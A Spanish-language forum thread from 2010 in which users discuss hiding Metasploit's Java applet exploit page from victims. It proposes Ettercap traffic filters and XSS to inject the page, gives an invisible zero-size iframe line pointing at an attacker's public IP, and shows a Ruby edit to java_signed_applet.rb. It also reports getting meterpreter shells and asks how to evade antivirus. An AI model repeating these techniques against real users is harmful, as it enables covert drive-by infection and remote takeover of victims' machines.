Redireccionar JavaApplet

Iniciado por darko666, 29 Marzo 2010, 00:47 AM

0 Miembros y 1 Visitante están viendo este tema.

darko666

Resulta que estoy haciendo pruebas de pentesting centrandome en la intrusion con JavaApplet a traves de HTML,  y la que mejor me funciona es la que trae la ultima version de metasploit. Y el problema reside en que metasploit te genera un index.html y me gustaria poder modificar este html para poder redireccionar la salida a una web real para que asi la victima pueda seguir navegando.
Es posible o es una ilusion???

Shell Root

Podes usar los filtros de Ettercap, aumentando dentro del source de las paginas webs, la apertura de la pagina infectada con el exploit, configurando con parametros para que el usuario no vea y siempre este por debajo de la pagina real.

Me habia retirado un poco del Metasploit, pero ahora estoy devuelta, asi que alguna duda estamos aquì. Creo que tengo un ejemplo de como usar lo que te digo, pero voy a dejar que pienses un poco.

Saludos!
Por eso no duermo, por si tras mi ventana hay un cuervo. Cuelgo de hilos sueltos sabiendo que hay veneno en el aire.

MagnoBalt

Hola darko666 , lo que puedes hacer es colocar un iframe invisible, en alguna pagina exploptando XSS por ejemplo.!!

Shell Root

Cita de: MagnoBalt en 29 Marzo 2010, 07:32 AMHola darko666 , lo que puedes hacer es colocar un iframe invisible, en alguna pagina exploptando XSS por ejemplo.!!
WTF!...

Es depende del Exploit que vayas a usar, es decir, algunos provocan un consume de memoria, BoF, etc. Asì que si quieres que el usuario pase desapercibido. Como os dije al inicio, debes de realizar un filtro con ettercap, donde realizes un replace a alguna etiqueda y le añades un valor como una PopUp que, quede por debajo de la ventana que el usuario tenga abierta.

Si lo haces con el Iframe que dice MagnoBalt, igualmanera el usuario se và a dar cuenta, ya que la ventana queda frizeada XD. O bueno, eso supongo...  :silbar:
Por eso no duermo, por si tras mi ventana hay un cuervo. Cuelgo de hilos sueltos sabiendo que hay veneno en el aire.

MagnoBalt

#4
CitarHola darko666 , lo que puedes hacer es colocar un iframe invisible, en alguna pagina exploptando XSS por ejemplo.!!
WTF!...

?????????.. en que momento darko666 hablo  de algun BOF!!! no se si lo leiste bien Alex@ShellRoot, o solo peudes hacer copy and paste.!!
El esta realizando con JavaApplet, tranquilamente puedes colocar un iframe oculto, en alguna web que tengas acceso o algun XSS.. de la forma.. Supongamos que nuestro java se esta ejecutando en una http://IP-PUBLICA con el metasploit, entonces quedaria asi:

Código (html4strict) [Seleccionar]
<iframe src="http://IP-PUBLICA "frameborder=0 width=0 height=0></iframe>

Saludos

Shell Root

dantemc :-* ...

Pero la ejecuciòn del Exploit no es de un BoF, asì que no quedarà frizzeada. Èl solo quiere cambiarle el source al archivo generado por el MSF!. Como os dije, intentad con el parametro ContextInformationFile. Esperemos a ver que nos dice el usuario.
Por eso no duermo, por si tras mi ventana hay un cuervo. Cuelgo de hilos sueltos sabiendo que hay veneno en el aire.

darko666

En principio solo queria modificar el fichero index.html que te genera el metasploit, aunque cualquier método alternativo de ataque siempre es bienvenido.
Por cierto, ya lo tengo solucionado. Lo que hice fue editar el fichero java_signed_applet.rb, buscar el sitio donde se genera el html y añadirle un iframe con la dirección www que me interese. De momento parece que funcione a nivel de LAN y WAN con máquinas virtuales

Shell Root

Modificar el fichero java_signed_applet.rb, xD. En que parte lo hicistes?
Por eso no duermo, por si tras mi ventana hay un cuervo. Cuelgo de hilos sueltos sabiendo que hay veneno en el aire.

darko666

Vas al final del archivo y allí es donde te encuentras las sentencias en ruby para crear el fichero html.
Le añades una sentencia similar a:
html += "<iframe frameborder='0' width='900' height='1000' src='http://www.google.es'></iframe>"

Y cuando abres el metasploit y lo ejecutas, te genera el index.html esperando en el puerto que le hayas indicado.
El resultado es que cuando la víctima abre la página, le sale la ventanita del java applet a la vez que se va cargando el link del iframe. Lo he probado sobre un xp sp3 (sin antivirus) con la ultima version de explorer, firefox y safari y en los 3 el metasplot me ha devuelto el deseado meterpreter. El único problema, és que con un buen antivirus no funciona, porque detecta que alguien se intenta conectar a la máquina. No se si hay alguna forma de que la infección por java pueda ser totalmente indetectable por los antivirus.

Shell Root

Cita de: darko666 en  1 Abril 2010, 22:11 PMVas al final del archivo y allí es donde te encuentras las sentencias en ruby para crear el fichero html.
Es completamente obvio.  :¬¬ . Podrias decirme de desde y hasta que linea modificaste, quiero ver algo...  :silbar:
Por eso no duermo, por si tras mi ventana hay un cuervo. Cuelgo de hilos sueltos sabiendo que hay veneno en el aire.